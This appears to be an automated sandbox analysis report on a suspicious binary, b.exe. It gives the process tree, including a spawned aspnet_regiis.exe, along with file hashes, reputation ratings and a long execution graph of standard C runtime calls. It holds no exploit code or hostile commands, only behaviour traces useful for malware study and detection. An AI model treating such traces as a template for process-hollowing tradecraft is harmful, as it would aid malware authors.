                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:04:24:58
                                                                  Start date:23/11/2024
                                                                  Path:C:\Users\user\Desktop\b.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\b.exe"
                                                                  Imagebase:0x860000
                                                                  File size:716'800 bytes
                                                                  MD5 hash:1D08526FC81B1D62195F4E5DEA52BB6F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:04:24:58
                                                                  Start date:23/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:04:24:58
                                                                  Start date:23/11/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                  Imagebase:0x430000
                                                                  File size:43'016 bytes
                                                                  MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:04:24:59
                                                                  Start date:23/11/2024
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228
                                                                  Imagebase:0xdf0000
                                                                  File size:483'680 bytes
                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:15.3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:5.3%
                                                                    Total number of Nodes:1444
                                                                    Total number of Limit Nodes:10
                                                                    execution_graph 11198 6cde475d 11199 6cde476e 11198->11199 11200 6cde0dc0 _ValidateLocalCookies 5 API calls 11199->11200 11201 6cde4958 11200->11201 10748 6cde54d8 GetCommandLineA GetCommandLineW 10749 6cde36d4 10750 6cde36d7 10749->10750 10751 6cde3759 __fassign 37 API calls 10750->10751 10752 6cde36e3 10751->10752 9527 6cde0dce 9528 6cde0e0c 9527->9528 9529 6cde0dd9 9527->9529 9566 6cde0f28 9528->9566 9530 6cde0dfe 9529->9530 9531 6cde0dde 9529->9531 9539 6cde0e21 9530->9539 9533 6cde0df4 9531->9533 9534 6cde0de3 9531->9534 9558 6cde13db 9533->9558 9538 6cde0de8 9534->9538 9553 6cde13fa 9534->9553 9540 6cde0e2d ___scrt_is_nonwritable_in_current_image 9539->9540 9593 6cde146b 9540->9593 9542 6cde0e34 __DllMainCRTStartup@12 9543 6cde0e5b 9542->9543 9544 6cde0f20 9542->9544 9550 6cde0e97 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 9542->9550 9604 6cde13cd 9543->9604 9612 6cde160a IsProcessorFeaturePresent 9544->9612 9547 6cde0f27 9548 6cde0e6a __RTC_Initialize 9548->9550 9607 6cde12eb InitializeSListHead 9548->9607 9550->9538 9551 6cde0e78 9551->9550 9608 6cde13a2 9551->9608 9706 6cde365e 9553->9706 10010 6cde22b0 9558->10010 9561 6cde13e4 9561->9538 9564 6cde13f7 9564->9538 9565 6cde22bb 21 API calls 9565->9561 9567 6cde0f34 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 9566->9567 9568 6cde0f65 9567->9568 9569 6cde0fd0 9567->9569 9585 6cde0f3d 9567->9585 10030 6cde143b 9568->10030 9570 6cde160a __DllMainCRTStartup@12 4 API calls 9569->9570 9574 6cde0fd7 ___scrt_is_nonwritable_in_current_image 9570->9574 9572 6cde0f6a 10039 6cde12f7 9572->10039 9576 6cde100d dllmain_raw 9574->9576 9578 6cde1008 9574->9578 9590 6cde0ff3 9574->9590 9575 6cde0f6f __RTC_Initialize __DllMainCRTStartup@12 10042 6cde15dc 9575->10042 9577 6cde1027 dllmain_crt_dispatch 9576->9577 9576->9590 9577->9578 9577->9590 10051 6cddfcb0 9578->10051 9584 6cde1079 9586 6cde1082 dllmain_crt_dispatch 9584->9586 9584->9590 9585->9538 9588 6cde1095 dllmain_raw 9586->9588 9586->9590 9587 6cddfcb0 __DllMainCRTStartup@12 5 API calls 9589 6cde1060 9587->9589 9588->9590 9591 6cde0f28 __DllMainCRTStartup@12 79 API calls 9589->9591 9590->9538 9592 6cde106e dllmain_raw 9591->9592 9592->9584 9594 6cde1474 9593->9594 9616 6cde17d8 IsProcessorFeaturePresent 9594->9616 9598 6cde1485 9603 6cde1489 9598->9603 9626 6cde3641 9598->9626 9601 6cde14a0 9601->9542 9603->9542 9700 6cde14a4 9604->9700 9606 6cde13d4 9606->9548 9607->9551 9609 6cde13a7 ___scrt_release_startup_lock 9608->9609 9610 6cde17d8 IsProcessorFeaturePresent 9609->9610 9611 6cde13b0 9609->9611 9610->9611 9611->9550 9613 6cde1620 __DllMainCRTStartup@12 9612->9613 9614 6cde16cb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9613->9614 9615 6cde1716 __DllMainCRTStartup@12 9614->9615 9615->9547 9617 6cde1480 9616->9617 9618 6cde2291 9617->9618 9635 6cde26c7 9618->9635 9622 6cde22ad 9622->9598 9623 6cde22a2 9623->9622 9649 6cde2703 9623->9649 9625 6cde229a 9625->9598 9691 6cde5d8d 9626->9691 9629 6cde22c6 9630 6cde22cf 9629->9630 9631 6cde22d9 9629->9631 9632 6cde26ac ___vcrt_uninitialize_ptd 6 API calls 9630->9632 9631->9603 9633 6cde22d4 9632->9633 9634 6cde2703 ___vcrt_uninitialize_locks DeleteCriticalSection 9633->9634 9634->9631 9636 6cde26d0 9635->9636 9638 6cde26f9 9636->9638 9639 6cde2296 9636->9639 9653 6cde2935 9636->9653 9640 6cde2703 ___vcrt_uninitialize_locks DeleteCriticalSection 9638->9640 9639->9625 9641 6cde2679 9639->9641 9640->9639 9672 6cde2846 9641->9672 9644 6cde268e 9644->9623 9647 6cde26a9 9647->9623 9650 6cde272d 9649->9650 9651 6cde270e 9649->9651 9650->9625 9652 6cde2718 DeleteCriticalSection 9651->9652 9652->9650 9652->9652 9658 6cde27fd 9653->9658 9656 6cde296d InitializeCriticalSectionAndSpinCount 9657 6cde2958 9656->9657 9657->9636 9659 6cde2815 9658->9659 9660 6cde2838 9658->9660 9659->9660 9664 6cde2763 9659->9664 9660->9656 9660->9657 9663 6cde282a GetProcAddress 9663->9660 9665 6cde276f ___vcrt_InitializeCriticalSectionEx 9664->9665 9666 6cde27e3 9665->9666 9667 6cde2785 LoadLibraryExW 9665->9667 9671 6cde27c5 LoadLibraryExW 9665->9671 9666->9660 9666->9663 9668 6cde27ea 9667->9668 9669 6cde27a3 GetLastError 9667->9669 9668->9666 9670 6cde27f2 FreeLibrary 9668->9670 9669->9665 9670->9666 9671->9665 9671->9668 9673 6cde27fd ___vcrt_InitializeCriticalSectionEx 5 API calls 9672->9673 9674 6cde2860 9673->9674 9675 6cde2879 TlsAlloc 9674->9675 9676 6cde2683 9674->9676 9676->9644 9677 6cde28f7 9676->9677 9678 6cde27fd ___vcrt_InitializeCriticalSectionEx 5 API calls 9677->9678 9679 6cde2911 9678->9679 9680 6cde292c TlsSetValue 9679->9680 9681 6cde269c 9679->9681 9680->9681 9681->9647 9682 6cde26ac 9681->9682 9683 6cde26b6 9682->9683 9684 6cde26bc 9682->9684 9686 6cde2881 9683->9686 9684->9644 9687 6cde27fd ___vcrt_InitializeCriticalSectionEx 5 API calls 9686->9687 9688 6cde289b 9687->9688 9689 6cde28b3 TlsFree 9688->9689 9690 6cde28a7 9688->9690 9689->9690 9690->9684 9692 6cde5d9d 9691->9692 9693 6cde1492 9691->9693 9692->9693 9695 6cde5c4d 9692->9695 9693->9601 9693->9629 9697 6cde5c54 9695->9697 9696 6cde5c97 GetStdHandle 9696->9697 9697->9696 9698 6cde5cfd 9697->9698 9699 6cde5caa GetFileType 9697->9699 9698->9692 9699->9697 9701 6cde14b4 9700->9701 9702 6cde14b0 9700->9702 9703 6cde160a __DllMainCRTStartup@12 4 API calls 9701->9703 9705 6cde14c1 ___scrt_release_startup_lock 9701->9705 9702->9606 9704 6cde152a 9703->9704 9705->9606 9712 6cde3c4b 9706->9712 9709 6cde22bb 9990 6cde25a3 9709->9990 9713 6cde13ff 9712->9713 9714 6cde3c55 9712->9714 9713->9709 9720 6cde59c1 9714->9720 9736 6cde5861 9720->9736 9722 6cde59dd 9723 6cde59f8 TlsGetValue 9722->9723 9724 6cde3c5c 9722->9724 9724->9713 9725 6cde5a00 9724->9725 9726 6cde5861 __dosmaperr 5 API calls 9725->9726 9727 6cde5a1c 9726->9727 9728 6cde5a3a TlsSetValue 9727->9728 9729 6cde3c6f 9727->9729 9730 6cde3b12 9729->9730 9731 6cde3b1d 9730->9731 9735 6cde3b2d 9730->9735 9749 6cde3b33 9731->9749 9735->9713 9737 6cde588f 9736->9737 9741 6cde588b __dosmaperr 9736->9741 9737->9741 9742 6cde579a 9737->9742 9740 6cde58a9 GetProcAddress 9740->9741 9741->9722 9743 6cde57ab ___vcrt_InitializeCriticalSectionEx 9742->9743 9744 6cde57c9 LoadLibraryExW 9743->9744 9746 6cde583f FreeLibrary 9743->9746 9747 6cde5856 9743->9747 9748 6cde5817 LoadLibraryExW 9743->9748 9744->9743 9745 6cde57e4 GetLastError 9744->9745 9745->9743 9746->9743 9747->9740 9747->9741 9748->9743 9750 6cde3b48 9749->9750 9751 6cde3b4e 9749->9751 9752 6cde4273 _free 14 API calls 9750->9752 9753 6cde4273 _free 14 API calls 9751->9753 9752->9751 9754 6cde3b5a 9753->9754 9755 6cde4273 _free 14 API calls 9754->9755 9756 6cde3b65 9755->9756 9757 6cde4273 _free 14 API calls 9756->9757 9758 6cde3b70 9757->9758 9759 6cde4273 _free 14 API calls 9758->9759 9760 6cde3b7b 9759->9760 9761 6cde4273 _free 14 API calls 9760->9761 9762 6cde3b86 9761->9762 9763 6cde4273 _free 14 API calls 9762->9763 9764 6cde3b91 9763->9764 9765 6cde4273 _free 14 API calls 9764->9765 9766 6cde3b9c 9765->9766 9767 6cde4273 _free 14 API calls 9766->9767 9768 6cde3ba7 9767->9768 9769 6cde4273 _free 14 API calls 9768->9769 9770 6cde3bb5 9769->9770 9781 6cde395f 9770->9781 9775 6cde4273 9776 6cde427e HeapFree 9775->9776 9777 6cde42a7 __dosmaperr 9775->9777 9776->9777 9778 6cde4293 9776->9778 9777->9735 9921 6cde4203 9778->9921 9782 6cde396b ___scrt_is_nonwritable_in_current_image 9781->9782 9797 6cde3f0a EnterCriticalSection 9782->9797 9785 6cde3975 9787 6cde4273 _free 14 API calls 9785->9787 9788 6cde399f 9785->9788 9787->9788 9798 6cde39be 9788->9798 9789 6cde39ca 9790 6cde39d6 ___scrt_is_nonwritable_in_current_image 9789->9790 9802 6cde3f0a EnterCriticalSection 9790->9802 9792 6cde39e0 9803 6cde3c00 9792->9803 9794 6cde39f3 9807 6cde3a13 9794->9807 9797->9785 9801 6cde3f52 LeaveCriticalSection 9798->9801 9800 6cde39ac 9800->9789 9801->9800 9802->9792 9804 6cde3c0f __fassign 9803->9804 9805 6cde3c36 __fassign 9803->9805 9804->9805 9810 6cde6958 9804->9810 9805->9794 9920 6cde3f52 LeaveCriticalSection 9807->9920 9809 6cde3a01 9809->9775 9811 6cde696e 9810->9811 9812 6cde69d8 9810->9812 9811->9812 9816 6cde69a1 9811->9816 9821 6cde4273 _free 14 API calls 9811->9821 9814 6cde4273 _free 14 API calls 9812->9814 9837 6cde6a26 9812->9837 9815 6cde69fa 9814->9815 9817 6cde4273 _free 14 API calls 9815->9817 9818 6cde69c3 9816->9818 9825 6cde4273 _free 14 API calls 9816->9825 9819 6cde6a0d 9817->9819 9820 6cde4273 _free 14 API calls 9818->9820 9824 6cde4273 _free 14 API calls 9819->9824 9826 6cde69cd 9820->9826 9823 6cde6996 9821->9823 9822 6cde6a34 9827 6cde6a94 9822->9827 9836 6cde4273 14 API calls _free 9822->9836 9838 6cde8887 9823->9838 9829 6cde6a1b 9824->9829 9830 6cde69b8 9825->9830 9831 6cde4273 _free 14 API calls 9826->9831 9832 6cde4273 _free 14 API calls 9827->9832 9834 6cde4273 _free 14 API calls 9829->9834 9866 6cde8985 9830->9866 9831->9812 9833 6cde6a9a 9832->9833 9833->9805 9834->9837 9836->9822 9878 6cde6ac9 9837->9878 9839 6cde8898 9838->9839 9865 6cde8981 9838->9865 9840 6cde88a9 9839->9840 9841 6cde4273 _free 14 API calls 9839->9841 9842 6cde88bb 9840->9842 9843 6cde4273 _free 14 API calls 9840->9843 9841->9840 9844 6cde4273 _free 14 API calls 9842->9844 9848 6cde88cd 9842->9848 9843->9842 9844->9848 9845 6cde4273 _free 14 API calls 9846 6cde88df 9845->9846 9847 6cde88f1 9846->9847 9849 6cde4273 _free 14 API calls 9846->9849 9850 6cde8903 9847->9850 9851 6cde4273 _free 14 API calls 9847->9851 9848->9845 9848->9846 9849->9847 9852 6cde8915 9850->9852 9854 6cde4273 _free 14 API calls 9850->9854 9851->9850 9853 6cde8927 9852->9853 9855 6cde4273 _free 14 API calls 9852->9855 9856 6cde8939 9853->9856 9857 6cde4273 _free 14 API calls 9853->9857 9854->9852 9855->9853 9858 6cde894b 9856->9858 9859 6cde4273 _free 14 API calls 9856->9859 9857->9856 9860 6cde895d 9858->9860 9862 6cde4273 _free 14 API calls 9858->9862 9859->9858 9861 6cde896f 9860->9861 9863 6cde4273 _free 14 API calls 9860->9863 9864 6cde4273 _free 14 API calls 9861->9864 9861->9865 9862->9860 9863->9861 9864->9865 9865->9816 9867 6cde89ea 9866->9867 9868 6cde8992 9866->9868 9867->9818 9869 6cde89a2 9868->9869 9870 6cde4273 _free 14 API calls 9868->9870 9871 6cde89b4 9869->9871 9873 6cde4273 _free 14 API calls 9869->9873 9870->9869 9872 6cde89c6 9871->9872 9874 6cde4273 _free 14 API calls 9871->9874 9875 6cde89d8 9872->9875 9876 6cde4273 _free 14 API calls 9872->9876 9873->9871 9874->9872 9875->9867 9877 6cde4273 _free 14 API calls 9875->9877 9876->9875 9877->9867 9879 6cde6ad6 9878->9879 9880 6cde6af5 9878->9880 9879->9880 9884 6cde8a26 9879->9884 9880->9822 9883 6cde4273 _free 14 API calls 9883->9880 9885 6cde6aef 9884->9885 9886 6cde8a37 9884->9886 9885->9883 9887 6cde89ee __fassign 14 API calls 9886->9887 9888 6cde8a3f 9887->9888 9889 6cde89ee __fassign 14 API calls 9888->9889 9890 6cde8a4a 9889->9890 9891 6cde89ee __fassign 14 API calls 9890->9891 9892 6cde8a55 9891->9892 9893 6cde89ee __fassign 14 API calls 9892->9893 9894 6cde8a60 9893->9894 9895 6cde89ee __fassign 14 API calls 9894->9895 9896 6cde8a6e 9895->9896 9897 6cde4273 _free 14 API calls 9896->9897 9898 6cde8a79 9897->9898 9899 6cde4273 _free 14 API calls 9898->9899 9900 6cde8a84 9899->9900 9901 6cde4273 _free 14 API calls 9900->9901 9902 6cde8a8f 9901->9902 9903 6cde89ee __fassign 14 API calls 9902->9903 9904 6cde8a9d 9903->9904 9905 6cde89ee __fassign 14 API calls 9904->9905 9906 6cde8aab 9905->9906 9907 6cde89ee __fassign 14 API calls 9906->9907 9908 6cde8abc 9907->9908 9909 6cde89ee __fassign 14 API calls 9908->9909 9910 6cde8aca 9909->9910 9911 6cde89ee __fassign 14 API calls 9910->9911 9912 6cde8ad8 9911->9912 9913 6cde4273 _free 14 API calls 9912->9913 9914 6cde8ae3 9913->9914 9915 6cde4273 _free 14 API calls 9914->9915 9916 6cde8aee 9915->9916 9917 6cde4273 _free 14 API calls 9916->9917 9918 6cde8af9 9917->9918 9919 6cde4273 _free 14 API calls 9918->9919 9919->9885 9920->9809 9924 6cde3dce GetLastError 9921->9924 9923 6cde4208 GetLastError 9923->9777 9925 6cde3de5 9924->9925 9926 6cde3deb 9924->9926 9927 6cde59c1 __dosmaperr 6 API calls 9925->9927 9928 6cde5a00 __dosmaperr 6 API calls 9926->9928 9944 6cde3df1 SetLastError 9926->9944 9927->9926 9929 6cde3e09 9928->9929 9929->9944 9947 6cde4216 9929->9947 9933 6cde3e38 9936 6cde5a00 __dosmaperr 6 API calls 9933->9936 9934 6cde3e21 9935 6cde5a00 __dosmaperr 6 API calls 9934->9935 9937 6cde3e2f 9935->9937 9938 6cde3e44 9936->9938 9941 6cde4273 _free 12 API calls 9937->9941 9939 6cde3e48 9938->9939 9940 6cde3e59 9938->9940 9942 6cde5a00 __dosmaperr 6 API calls 9939->9942 9954 6cde3a79 9940->9954 9941->9944 9942->9937 9944->9923 9946 6cde4273 _free 12 API calls 9946->9944 9948 6cde4223 __dosmaperr 9947->9948 9949 6cde4263 9948->9949 9950 6cde424e HeapAlloc 9948->9950 9959 6cde5e35 9948->9959 9952 6cde4203 __dosmaperr 13 API calls 9949->9952 9950->9948 9951 6cde3e19 9950->9951 9951->9933 9951->9934 9952->9951 9968 6cde390d 9954->9968 9962 6cde5e62 9959->9962 9963 6cde5e6e ___scrt_is_nonwritable_in_current_image 9962->9963 9964 6cde3f0a __dosmaperr EnterCriticalSection 9963->9964 9965 6cde5e79 9964->9965 9966 6cde5eb5 __dosmaperr LeaveCriticalSection 9965->9966 9967 6cde5e40 9966->9967 9967->9948 9969 6cde3919 ___scrt_is_nonwritable_in_current_image 9968->9969 9982 6cde3f0a EnterCriticalSection 9969->9982 9971 6cde3923 9983 6cde3953 9971->9983 9974 6cde3a1f 9975 6cde3a2b ___scrt_is_nonwritable_in_current_image 9974->9975 9986 6cde3f0a EnterCriticalSection 9975->9986 9977 6cde3a35 9978 6cde3c00 __dosmaperr 14 API calls 9977->9978 9979 6cde3a4d 9978->9979 9987 6cde3a6d 9979->9987 9982->9971 9984 6cde3f52 __dosmaperr LeaveCriticalSection 9983->9984 9985 6cde3941 9984->9985 9985->9974 9986->9977 9988 6cde3f52 __dosmaperr LeaveCriticalSection 9987->9988 9989 6cde3a5b 9988->9989 9989->9946 9991 6cde1404 9990->9991 9992 6cde25b0 9990->9992 9991->9538 9993 6cde25be 9992->9993 9998 6cde28bc 9992->9998 9995 6cde28f7 ___vcrt_FlsSetValue 6 API calls 9993->9995 9996 6cde25ce 9995->9996 10003 6cde2587 9996->10003 9999 6cde27fd ___vcrt_InitializeCriticalSectionEx 5 API calls 9998->9999 10000 6cde28d6 9999->10000 10001 6cde28ee TlsGetValue 10000->10001 10002 6cde28e2 10000->10002 10001->10002 10002->9993 10004 6cde259e 10003->10004 10005 6cde2591 10003->10005 10004->9991 10005->10004 10007 6cde36e4 10005->10007 10008 6cde4273 _free 14 API calls 10007->10008 10009 6cde36fc 10008->10009 10009->10004 10016 6cde25e7 10010->10016 10012 6cde13e0 10012->9561 10013 6cde3653 10012->10013 10014 6cde3dce __dosmaperr 14 API calls 10013->10014 10015 6cde13ec 10014->10015 10015->9564 10015->9565 10017 6cde25f3 GetLastError 10016->10017 10018 6cde25f0 10016->10018 10019 6cde28bc ___vcrt_FlsGetValue 6 API calls 10017->10019 10018->10012 10021 6cde2608 10019->10021 10020 6cde266d SetLastError 10020->10012 10021->10020 10022 6cde28f7 ___vcrt_FlsSetValue 6 API calls 10021->10022 10029 6cde2627 10021->10029 10023 6cde2621 10022->10023 10024 6cde2649 10023->10024 10025 6cde28f7 ___vcrt_FlsSetValue 6 API calls 10023->10025 10023->10029 10026 6cde28f7 ___vcrt_FlsSetValue 6 API calls 10024->10026 10027 6cde265d 10024->10027 10025->10024 10026->10027 10028 6cde36e4 ___std_type_info_destroy_list 14 API calls 10027->10028 10028->10029 10029->10020 10031 6cde1440 ___scrt_release_startup_lock 10030->10031 10032 6cde1444 10031->10032 10034 6cde1450 __DllMainCRTStartup@12 10031->10034 10055 6cde34ce 10032->10055 10036 6cde145d 10034->10036 10058 6cde2d31 10034->10058 10036->9572 10125 6cde226e InterlockedFlushSList 10039->10125 10043 6cde15e8 10042->10043 10044 6cde0f8e 10043->10044 10129 6cde3666 10043->10129 10048 6cde0fca 10044->10048 10046 6cde15f6 10047 6cde22c6 ___scrt_uninitialize_crt 7 API calls 10046->10047 10047->10044 10242 6cde145e 10048->10242 10052 6cddfd14 10051->10052 10259 6cde0dc0 10052->10259 10054 6cde0c4f 10054->9584 10054->9587 10069 6cde3399 10055->10069 10059 6cde2d3f 10058->10059 10067 6cde2d50 10058->10067 10086 6cde2dd7 GetModuleHandleW 10059->10086 10064 6cde2d8a 10064->9572 10093 6cde2bf7 10067->10093 10070 6cde33a5 ___scrt_is_nonwritable_in_current_image 10069->10070 10077 6cde3f0a EnterCriticalSection 10070->10077 10072 6cde33b3 10078 6cde33f4 10072->10078 10077->10072 10079 6cde33c0 10078->10079 10080 6cde3413 10078->10080 10082 6cde33e8 10079->10082 10080->10079 10081 6cde4273 _free 14 API calls 10080->10081 10081->10079 10085 6cde3f52 LeaveCriticalSection 10082->10085 10084 6cde144e 10084->9572 10085->10084 10087 6cde2d44 10086->10087 10087->10067 10088 6cde2e1a GetModuleHandleExW 10087->10088 10089 6cde2e39 GetProcAddress 10088->10089 10092 6cde2e4e 10088->10092 10089->10092 10090 6cde2e6b 10090->10067 10091 6cde2e62 FreeLibrary 10091->10090 10092->10090 10092->10091 10094 6cde2c03 ___scrt_is_nonwritable_in_current_image 10093->10094 10109 6cde3f0a EnterCriticalSection 10094->10109 10096 6cde2c0d 10110 6cde2c44 10096->10110 10098 6cde2c1a 10114 6cde2c38 10098->10114 10101 6cde2d95 10118 6cde3f69 GetPEB 10101->10118 10104 6cde2dc4 10107 6cde2e1a __DllMainCRTStartup@12 3 API calls 10104->10107 10105 6cde2da4 GetPEB 10105->10104 10106 6cde2db4 GetCurrentProcess TerminateProcess 10105->10106 10106->10104 10108 6cde2dcc ExitProcess 10107->10108 10109->10096 10111 6cde2c50 ___scrt_is_nonwritable_in_current_image 10110->10111 10112 6cde2cb1 __DllMainCRTStartup@12 10111->10112 10113 6cde34ce __DllMainCRTStartup@12 14 API calls 10111->10113 10112->10098 10113->10112 10117 6cde3f52 LeaveCriticalSection 10114->10117 10116 6cde2c26 10116->10064 10116->10101 10117->10116 10119 6cde2d9f 10118->10119 10120 6cde3f83 10118->10120 10119->10104 10119->10105 10122 6cde58e4 10120->10122 10123 6cde5861 __dosmaperr 5 API calls 10122->10123 10124 6cde5900 10123->10124 10124->10119 10126 6cde227e 10125->10126 10128 6cde1301 10125->10128 10127 6cde36e4 ___std_type_info_destroy_list 14 API calls 10126->10127 10126->10128 10127->10126 10128->9575 10131 6cde3671 10129->10131 10132 6cde3683 ___scrt_uninitialize_crt 10129->10132 10130 6cde367f 10130->10046 10131->10130 10134 6cde64a7 10131->10134 10132->10046 10137 6cde6355 10134->10137 10140 6cde62a9 10137->10140 10141 6cde62b5 ___scrt_is_nonwritable_in_current_image 10140->10141 10148 6cde3f0a EnterCriticalSection 10141->10148 10143 6cde62bf ___scrt_uninitialize_crt 10144 6cde632b 10143->10144 10149 6cde621d 10143->10149 10157 6cde6349 10144->10157 10148->10143 10150 6cde6229 ___scrt_is_nonwritable_in_current_image 10149->10150 10160 6cde65c4 EnterCriticalSection 10150->10160 10152 6cde626c 10171 6cde629d 10152->10171 10153 6cde6233 ___scrt_uninitialize_crt 10153->10152 10161 6cde645f 10153->10161 10241 6cde3f52 LeaveCriticalSection 10157->10241 10159 6cde6337 10159->10130 10160->10153 10162 6cde646c 10161->10162 10163 6cde6475 10161->10163 10164 6cde6355 ___scrt_uninitialize_crt 66 API calls 10162->10164 10174 6cde63fa 10163->10174 10166 6cde6472 10164->10166 10166->10152 10169 6cde6491 10187 6cde7ac2 10169->10187 10240 6cde65d8 LeaveCriticalSection 10171->10240 10173 6cde628b 10173->10143 10175 6cde6412 10174->10175 10179 6cde6437 10174->10179 10176 6cde67f0 ___scrt_uninitialize_crt 25 API calls 10175->10176 10175->10179 10177 6cde6430 10176->10177 10198 6cde82ba 10177->10198 10179->10166 10180 6cde67f0 10179->10180 10181 6cde67fc 10180->10181 10182 6cde6811 10180->10182 10183 6cde4203 __dosmaperr 14 API calls 10181->10183 10182->10169 10184 6cde6801 10183->10184 10223 6cde4146 10184->10223 10188 6cde7ad3 10187->10188 10191 6cde7ae0 10187->10191 10189 6cde4203 __dosmaperr 14 API calls 10188->10189 10197 6cde7ad8 10189->10197 10190 6cde7b29 10192 6cde4203 __dosmaperr 14 API calls 10190->10192 10191->10190 10193 6cde7b07 10191->10193 10194 6cde7b2e 10192->10194 10226 6cde7a20 10193->10226 10195 6cde4146 __fassign 25 API calls 10194->10195 10195->10197 10197->10166 10199 6cde82c6 ___scrt_is_nonwritable_in_current_image 10198->10199 10200 6cde82ce 10199->10200 10201 6cde82e6 10199->10201 10202 6cde41f0 __dosmaperr 14 API calls 10200->10202 10203 6cde8381 10201->10203 10207 6cde8318 10201->10207 10204 6cde82d3 10202->10204 10205 6cde41f0 __dosmaperr 14 API calls 10203->10205 10206 6cde4203 __dosmaperr 14 API calls 10204->10206 10208 6cde8386 10205->10208 10222 6cde82db 10206->10222 10209 6cde78df ___scrt_uninitialize_crt EnterCriticalSection 10207->10209 10210 6cde4203 __dosmaperr 14 API calls 10208->10210 10211 6cde831e 10209->10211 10212 6cde838e 10210->10212 10213 6cde834f 10211->10213 10214 6cde833a 10211->10214 10215 6cde4146 __fassign 25 API calls 10212->10215 10217 6cde83ac ___scrt_uninitialize_crt 60 API calls 10213->10217 10216 6cde4203 __dosmaperr 14 API calls 10214->10216 10215->10222 10218 6cde833f 10216->10218 10219 6cde834a 10217->10219 10220 6cde41f0 __dosmaperr 14 API calls 10218->10220 10221 6cde8379 ___scrt_uninitialize_crt LeaveCriticalSection 10219->10221 10220->10219 10221->10222 10222->10179 10224 6cde40e2 __fassign 25 API calls 10223->10224 10225 6cde4152 10224->10225 10225->10169 10227 6cde7a2c ___scrt_is_nonwritable_in_current_image 10226->10227 10228 6cde78df ___scrt_uninitialize_crt EnterCriticalSection 10227->10228 10229 6cde7a3b 10228->10229 10230 6cde7a82 10229->10230 10231 6cde79b6 ___scrt_uninitialize_crt 25 API calls 10229->10231 10232 6cde4203 __dosmaperr 14 API calls 10230->10232 10233 6cde7a67 FlushFileBuffers 10231->10233 10234 6cde7a87 10232->10234 10233->10234 10235 6cde7a73 10233->10235 10236 6cde7ab6 ___scrt_uninitialize_crt LeaveCriticalSection 10234->10236 10237 6cde41f0 __dosmaperr 14 API calls 10235->10237 10238 6cde7a9f 10236->10238 10239 6cde7a78 GetLastError 10237->10239 10238->10197 10239->10230 10240->10173 10241->10159 10247 6cde3696 10242->10247 10245 6cde26ac ___vcrt_uninitialize_ptd 6 API calls 10246 6cde0fcf 10245->10246 10246->9585 10250 6cde3eaf 10247->10250 10251 6cde3eb9 10250->10251 10252 6cde1465 10250->10252 10254 6cde5982 10251->10254 10252->10245 10255 6cde5861 __dosmaperr 5 API calls 10254->10255 10256 6cde599e 10255->10256 10257 6cde59b9 TlsFree 10256->10257 10258 6cde59a7 10256->10258 10258->10252 10260 6cde0dc8 10259->10260 10261 6cde0dc9 IsProcessorFeaturePresent 10259->10261 10260->10054 10263 6cde116e 10261->10263 10266 6cde1131 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10263->10266 10265 6cde1251 10265->10054 10266->10265 11202 6cde354e 11205 6cde335d 11202->11205 11206 6cde336c 11205->11206 11207 6cde32cf 14 API calls 11206->11207 11208 6cde3386 11207->11208 11209 6cde32cf 14 API calls 11208->11209 11210 6cde3391 11209->11210 10753 6cde3ec9 10754 6cde3ed4 10753->10754 10756 6cde3efd 10754->10756 10757 6cde3ef9 10754->10757 10759 6cde5a42 10754->10759 10764 6cde3f21 10756->10764 10760 6cde5861 __dosmaperr 5 API calls 10759->10760 10761 6cde5a5e 10760->10761 10762 6cde5a7c InitializeCriticalSectionAndSpinCount 10761->10762 10763 6cde5a67 10761->10763 10762->10763 10763->10754 10765 6cde3f4d 10764->10765 10766 6cde3f2e 10764->10766 10765->10757 10767 6cde3f38 DeleteCriticalSection 10766->10767 10767->10765 10767->10767 11003 6cde4446 11006 6cde42c5 11003->11006 11007 6cde42ed 11006->11007 11008 6cde42d3 11006->11008 11010 6cde42f4 11007->11010 11011 6cde4313 11007->11011 11024 6cde4999 11008->11024 11013 6cde42dd 11010->11013 11028 6cde49ef 11010->11028 11012 6cde54f1 __fassign MultiByteToWideChar 11011->11012 11017 6cde4322 11012->11017 11015 6cde4329 GetLastError 11016 6cde41cd __dosmaperr 14 API calls 11015->11016 11019 6cde4335 11016->11019 11017->11015 11018 6cde434f 11017->11018 11020 6cde49ef 15 API calls 11017->11020 11018->11013 11021 6cde54f1 __fassign MultiByteToWideChar 11018->11021 11022 6cde4203 __dosmaperr 14 API calls 11019->11022 11020->11018 11023 6cde4366 11021->11023 11022->11013 11023->11013 11023->11015 11025 6cde49a4 11024->11025 11026 6cde49ac 11024->11026 11027 6cde4273 _free 14 API calls 11025->11027 11026->11013 